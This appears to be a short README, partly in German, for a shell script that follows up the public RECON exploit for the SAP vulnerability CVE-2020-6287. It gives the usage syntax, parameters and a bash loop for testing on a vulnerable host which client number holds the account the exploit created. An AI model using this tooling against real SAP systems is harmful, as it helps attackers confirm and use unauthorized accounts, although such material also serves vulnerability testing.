
Checker hilft, erstellte Konten zu verifizieren oder deren Mandat zu finden.
Hilfe des Checkers, um zu überprüfen, ob ein Konto erstellt wurde, oder um dessen Mandanten zu finden.
Das Skript ermöglicht es Ihnen, zu überprüfen, ob das Konto bei der Verwendung des Exploits RECON.py erstellt wurde, oder den Mandanten des erstellten Kontos zu ermitteln.
https://github.com/chipik/SAP_RECON
chmod +x
./checker_CVE-2020-6287.sh <start mndt> <stop mndt> <ip> <port> <login> <password>
- <start mndt> : first value of mandate for iterate (000-999) useful for me 000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520
- <stop mndt> : last value for iterate
- <ip> : IP address of vulnerable host
- <port> : endpoint of vulnerable service
- <login> : login created with RECON.py
- <password> : password created with RECON.py
for i in {000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520}; do ./checker_CVE-2020-6287.sh ${i} ${i} <ip> <port> <login> <password>;done

Der erste Wert ist ein Mandant. Code 302 bedeutet, dass der Benutzer existiert.